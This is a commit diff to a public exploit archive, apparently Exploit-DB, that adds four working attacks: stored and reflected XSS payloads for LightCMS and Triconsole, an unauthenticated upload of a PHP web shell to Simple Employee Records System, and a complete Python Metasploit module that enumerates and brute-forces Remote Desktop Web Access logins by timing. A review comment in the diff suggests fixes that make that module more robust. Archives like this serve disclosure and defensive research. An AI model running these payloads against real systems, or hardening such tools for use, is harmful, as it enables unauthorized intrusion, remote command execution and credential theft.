DB: 2021-02-27
4 changes to exploits/shellcodes Remote Desktop Web Access - Authentication Timing Attack (Metasploit Module) Simple Employee Records System 1.0 - File Upload RCE (Unauthenticated) Triconsole 3.75 - Reflected XSS LightCMS 1.3.4 - 'exclusive' Stored XSS
This commit is contained in:
parent
0ec0dacc0e
commit
b9c4ec0226
5 changed files with 284 additions and 0 deletions
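--- a/exploits/multiple/webapps/49598.txt
+++ b/exploits/multiple/webapps/49598.txt
@@ -0,0 +1,18 @@
+# Exploit Title: LightCMS 1.3.4 - 'exclusive' Stored XSS
+# Date: 25/02/2021
+# Exploit Author: Peithon
+# Vendor Homepage: https://github.com/eddy8/LightCMS
+# Software Link: https://github.com/eddy8/LightCMS/releases/tag/v1.3.4
+# Version: 1.3.4
+# Tested on: latest version of Chrome, Firefox on Windows and Linux
+# CVE: CVE-2021-3355
+
+An issue was discovered in LightCMS v1.3.4.(https://github.com/eddy8/LightCMS/issues/18) There is a stored-self XSS, allowing an attacker to execute HTML or JavaScript code in a vulnerable Title field to /admin/SensitiveWords.
+
+--------------------------Proof of Concept-----------------------
+
+1. Log in to the background.
+
+2. Navigate to System -> `/admin/SensitiveWords/create` & add the below-shared payload as the exclusive field value. Payload - </span><img src=1 onerror=alert(1) /><span>
+
+3. Visit page `/admin/SensitiveWords`, the payload will be triggered.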
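--- a/exploits/php/webapps/49596.txt
+++ b/exploits/php/webapps/49596.txt
@@ -0,0 +1,56 @@
+# Exploit Title: Simple Employee Records System 1.0 - File Upload RCE (Unauthenticated)
+# Date: 2021-02-25
+# Exploit Author: sml@lacashita.com
+# Vendor Homepage: https://www.sourcecodester.com/php/11393/employee-records-system.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/employee_records_system.zip
+# Version: v1.0
+# Tested on: Ubuntu 20.04.2
+
+uploadID.php can be used to upload .php files to
+'/uploads/employees_ids/' without authentication.
+
+POC
+---
+
+1) Make the following Request changing the "Host:" to your Victim IP.
+
+POST /dashboard/uploadID.php HTTP/1.1
+Host: 192.168.1.117
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101
+Firefox/78.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Content-Type: multipart/form-data;
+boundary=---------------------------5825462663702204104870787337
+Content-Length: 267
+DNT: 1
+Connection: close
+
+-----------------------------5825462663702204104870787337
+Content-Disposition: form-data; name="employee_ID"; filename="cmd2.php"
+Content-Type: image/png
+<?php
+$cmd=$_GET['cmd'];
+system($cmd);
+?>
+-----------------------------5825462663702204104870787337--
+
+
+2) You will get the response with the name of the uploaded file
+(upload_filename).
+
+HTTP/1.1 200 OK
+Server: nginx/1.18.0 (Ubuntu)
+Date: Thu, 25 Feb 2021 19:17:55 GMT
+Content-Type: text/html; charset=UTF-8
+Connection: close
+Content-Length: 77
+{"upload_filename":"Ag1rzKFWTlnCZhL_cmd2.php","selected_filename":"cmd2.php"}
+
+3) Your file will be located in:
+http://VICTIM_IP/uploads/employees_ids/Ag1rzKFWTlnCZhL_cmd2.php
+
+4) In this example, to run commands:
+http://192.168.1.117/uploads/employees_ids/Ag1rzKFWTlnCZhL_cmd2.php?cmd=whoami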
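--- a/exploits/php/webapps/49597.txt
+++ b/exploits/php/webapps/49597.txt
@@ -0,0 +1,11 @@
+# Exploit Title: Triconsole 3.75 - Reflected XSS
+# Google Dork: inurl : /calendar/calendar_form.php
+# Date: 15/2/2021
+# Exploit Author: Akash Chathoth
+# Vendor Homepage: http://www.triconsole.com/
+# Software Link: http://www.triconsole.com/php/calendar_datepicker.php
+# Version: < 3.76 (14 February 2021)
+# Tested on: 3.75
+# CVE: 2021-27330
+
+# Exploit : http://exapmle.com/calendar_form.php/"><script>alert(document.domain)</script>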
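--- a/exploits/windows/remote/49599.py
+++ b/exploits/windows/remote/49599.py
@@ -0,0 +1,195 @@
+#!/usr/bin/env python3
+# -*- coding: utf-8 -*-
+
+# standard modules
+from metasploit import module
+
+# extra modules
+DEPENDENCIES_MISSING = False
+try:
+    import base64
+    import itertools
+    import os
+    import requests
+except ImportError:
+    DEPENDENCIES_MISSING = True
+
+
+# Metasploit Metadata
+metadata = {
+    'name': 'Microsoft RDP Web Client Login Enumeration',
+    'description': '''
+        Enumerate valid usernames and passwords against a Microsoft RDP Web Client
+        by attempting authentication and performing a timing based check
+        against the provided username.
+    ''',
+    'authors': [
+        'Matthew Dunn'
+    ],
+    'date': '2020-12-23',
+    'license': 'MSF_LICENSE',
+    'references': [
+        {'type': 'url', 'ref': 'https://raxis.com/blog/rd-web-access-vulnerability'},
+    ],
+    'type': 'single_scanner',
+    'options': {
+        'targeturi': {'type': 'string',
+                      'description': 'The base path to the RDP Web Client install',
+                      'required': True, 'default': '/RDWeb/Pages/en-US/login.aspx'},
+        'rport': {'type': 'port', 'description': 'Port to target',
+                  'required': True, 'default': 443},
+        'domain': {'type': 'string', 'description': 'The target AD domain',
+                   'required': False, 'default': None},
+        'username': {'type': 'string',
+                     'description': 'The username to verify or path to a file of usernames',
+                     'required': True, 'default': None},
+        'password': {'type': 'string',
+                     'description': 'The password to try or path to a file of passwords',
+                     'required': False, 'default': None},
+        'timeout': {'type': 'int',
+                    'description': 'Response timeout in milliseconds to consider username invalid',
+                    'required': True, 'default': 1250},
+        'enum_domain': {'type': 'bool',
+                        'description': 'Automatically enumerate AD domain using NTLM',
+                        'required': False, 'default': True},
+        'verify_service': {'type': 'bool',
+                           'description': 'Verify the service is up before performing login scan',
+                           'required': False, 'default': True},
+        'user_agent': {'type': 'string',
+                       'description': 'User Agent string to use, defaults to Firefox',
+                       'required': False,
+                       'default': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0'}
+    }
+}
+
+
+def verify_service(rhost, rport, targeturi, timeout, user_agent):
+    """Verify the service is up at the target URI within the specified timeout"""
+    url = f'https://{rhost}:{rport}/{targeturi}'
+    headers = {'Host':rhost,
+               'User-Agent': user_agent}
+    try:
+        request = requests.get(url, headers=headers, timeout=(timeout / 1000),
+                               verify=False, allow_redirects=False)
+        return request.status_code == 200 and 'RDWeb' in request.text
+    except requests.exceptions.Timeout:
+        return False
+    except Exception as exc:
+        module.log(str(exc), level='error')
+        return False
+
+
+def get_ad_domain(rhost, rport, user_agent):
+    """Retrieve the NTLM domain out of a specific challenge/response"""
+    domain_urls = ['aspnet_client', 'Autodiscover', 'ecp', 'EWS', 'OAB',
+                   'Microsoft-Server-ActiveSync', 'PowerShell', 'rpc']
+    headers = {'Authorization': 'NTLM TlRMTVNTUAABAAAAB4IIogAAAAAAAAAAAAAAAAAAAAAGAbEdAAAADw==',
+               'User-Agent': user_agent,
+               'Host': rhost}
+    session = requests.Session()
+    for url in domain_urls:
+        target_url = f"https://{rhost}:{rport}/{url}"
+        request = session.get(target_url, headers=headers, verify=False)
+        # Decode the provided NTLM Response to strip out the domain name
+        if request.status_code == 401 and 'WWW-Authenticate' in request.headers and \
+           'NTLM' in request.headers['WWW-Authenticate']:
+            domain_hash = request.headers['WWW-Authenticate'].split('NTLM ')[1].split(',')[0]
+            domain = base64.b64decode(bytes(domain_hash,
+                                            'utf-8')).replace(b'\x00',b'').split(b'\n')[1]
+            domain = domain[domain.index(b'\x0f') + 1:domain.index(b'\x02')].decode('utf-8')
+            module.log(f'Found Domain: {domain}', level='good')
+            return domain
+    module.log('Failed to find Domain', level='error')
+    return None
+
+
+def check_login(rhost, rport, targeturi, domain, username, password, timeout, user_agent):
+    """Check a single login against the RDWeb Client
+    The timeout is used to specify the amount of milliseconds where a
+    response should consider the username invalid."""
+
+    url = f'https://{rhost}:{rport}/{targeturi}'
+    body = f'DomainUserName={domain}%5C{username}&UserPass={password}'
+    headers = {'Host':rhost,
+               'User-Agent': user_agent,
+               'Content-Type': 'application/x-www-form-urlencoded',
+               'Content-Length': f'{len(body)}',
+               'Origin': f'https://{rhost}'}
+    session = requests.Session()
+    report_data = {'domain':domain, 'address': rhost, 'port': rport,
+                   'protocol': 'tcp', 'service_name':'RDWeb'}
+    try:
+        request = session.post(url, data=body, headers=headers,
+                               timeout=(timeout / 1000), verify=False, allow_redirects=False)
+        if request.status_code == 302:
+            module.log(f'Login {domain}\\{username}:{password} is valid!', level='good')
+            module.report_correct_password(username, password, **report_data)
+        elif request.status_code == 200:
+            module.log(f'Password {password} is invalid but {domain}\\{username} is valid! Response received in {request.elapsed.microseconds / 1000} milliseconds',
+                       level='good')
+            module.report_valid_username(username, **report_data)
+        else:
+            module.log(f'Received unknown response with status code: {request.status_code}')
+    except requests.exceptions.Timeout:
+        module.log(f'Login {domain}\\{username}:{password} is invalid! No response received in {timeout} milliseconds',
+                   level='error')
+    except requests.exceptions.RequestException as exc:
+        module.log('{}'.format(exc), level='error')
+    return
+
+
+def check_logins(rhost, rport, targeturi, domain, usernames, passwords, timeout, user_agent):
+    """Check each username and password combination"""
+    for (username, password) in list(itertools.product(usernames, passwords)):
+        check_login(rhost, rport, targeturi, domain,
+                    username.strip(), password.strip(), timeout, user_agent)
+
+def run(args):
+    """Run the module, gathering the domain if desired and verifying usernames and passwords"""
+    module.LogHandler.setup(msg_prefix='{} - '.format(args['RHOSTS']))
+    if DEPENDENCIES_MISSING:
+        module.log('Module dependencies are missing, cannot continue', level='error')
+        return
+
+    user_agent = args['user_agent']
+    # Verify the service is up if requested
+    if args['verify_service']:
+        service_verified = verify_service(args['RHOSTS'], args['rport'],
+                                          args['targeturi'], int(args['timeout']), user_agent)
+        if service_verified:
+            module.log('Service is up, beginning scan...', level='good')
+        else:
+            module.log(f'Service appears to be down, no response in {args["timeout"]} milliseconds',
+                       level='error')
+            return
+
+    # Gather AD Domain either from args or enumeration
+    domain = args['domain'] if 'domain' in args else None
+    if not domain and args['enum_domain']:
+        domain = get_ad_domain(args['RHOSTS'], args['rport'], user_agent)
+
+    # Verify we have a proper domain
+    if not domain:
+        module.log('Either domain or enum_domain must be set to continue, aborting...',
+                   level='error')
+        return
+
+    # Gather usernames and passwords for enumeration
+    if os.path.isfile(args['username']):
+        with open(args['username'], 'r') as file_contents:
+            usernames = file_contents.readlines()
+    else:
+        usernames = [args['username']]
+    if 'password' in args and os.path.isfile(args['password']):
+        with open(args['password'], 'r') as file_contents:
+            passwords = file_contents.readlines()
+    elif 'password' in args and args['password']:
+        passwords = [args['password']]
+    else:
+        passwords = ['wrong']
+    # Check each valid login combination
+    check_logins(args['RHOSTS'], args['rport'], args['targeturi'],
+                 domain, usernames, passwords, int(args['timeout']), user_agent)
+
+if __name__ == '__main__':
+    module.run(metadata, run)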
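Review bot: `get_ad_domain` is the only request path in this file that sends no `timeout=`: `session.get(target_url, headers=headers, verify=False)` can block indefinitely on a host that accepts the connection but never answers, while `verify_service` and `check_login` both pass `timeout=(timeout / 1000)`; thread the module timeout through, e.g. `def get_ad_domain(rhost, rport, user_agent, timeout):` with `session.get(target_url, headers=headers, verify=False, timeout=(timeout / 1000))` and `get_ad_domain(args['RHOSTS'], args['rport'], user_agent, int(args['timeout']))` in `run`. The challenge parsing that follows (`split('NTLM ')[1]`, `split(b'\n')[1]`, `domain.index(b'\x0f')`, `domain.index(b'\x02')`) raises `IndexError`/`ValueError` whenever a `WWW-Authenticate` value contains `NTLM` but not the expected Type 2 layout (for instance a bare `NTLM` or `Negotiate, NTLM` offer), so one unusual 401 aborts the module with a traceback instead of falling through to the `'Failed to find Domain'` branch; wrap the decode in `try:` / `except (IndexError, ValueError): continue`. As a style point, `check_logins` wraps `itertools.product(usernames, passwords)` in `list(...)` for no reason — iterating the product directly avoids materialising every combination up front.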
|
@ -18389,6 +18389,7 @@ id,file,description,date,author,type,platform,port
|
|||
49261,exploits/solaris/remote/49261.c,"Solaris SunSSH 11.0 x86 - libpam Remote Root",2020-12-15,"Hacker Fantastic",remote,solaris,
|
||||
49418,exploits/multiple/remote/49418.py,"Erlang Cookie - Remote Code Execution",2021-01-13,1F98D,remote,multiple,
|
||||
49594,exploits/windows/remote/49594.py,"ASUS Remote Link 1.1.2.13 - Remote Code Execution",2021-02-25,H4rk3nz0,remote,windows,
|
||||
49599,exploits/windows/remote/49599.py,"Remote Desktop Web Access - Authentication Timing Attack (Metasploit Module)",2021-02-26,"Matthew Dunn",remote,windows,
|
||||
6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
|
||||
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
|
||||
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
|
||||
|
@ -43784,3 +43785,6 @@ id,file,description,date,author,type,platform,port
|
|||
49573,exploits/php/webapps/49573.py,"Batflat CMS 1.3.6 - Remote Code Execution (Authenticated)",2021-02-18,mari0x00,webapps,php,
|
||||
49593,exploits/php/webapps/49593.txt,"LayerBB 1.1.4 - 'search_query' SQL Injection",2021-02-24,"Görkem Haşin",webapps,php,
|
||||
49595,exploits/php/webapps/49595.txt,"Vehicle Parking Management System 1.0 - 'catename' Persistent Cross-Site Scripting (XSS)",2021-02-25,"Tushar Vaidya",webapps,php,
|
||||
49596,exploits/php/webapps/49596.txt,"Simple Employee Records System 1.0 - File Upload RCE (Unauthenticated)",2021-02-26,sml,webapps,php,
|
||||
49597,exploits/php/webapps/49597.txt,"Triconsole 3.75 - Reflected XSS",2021-02-26,"Akash Chathoth",webapps,php,
|
||||
49598,exploits/multiple/webapps/49598.txt,"LightCMS 1.3.4 - 'exclusive' Stored XSS",2021-02-26,Peithon,webapps,multiple,
|
||||
|
|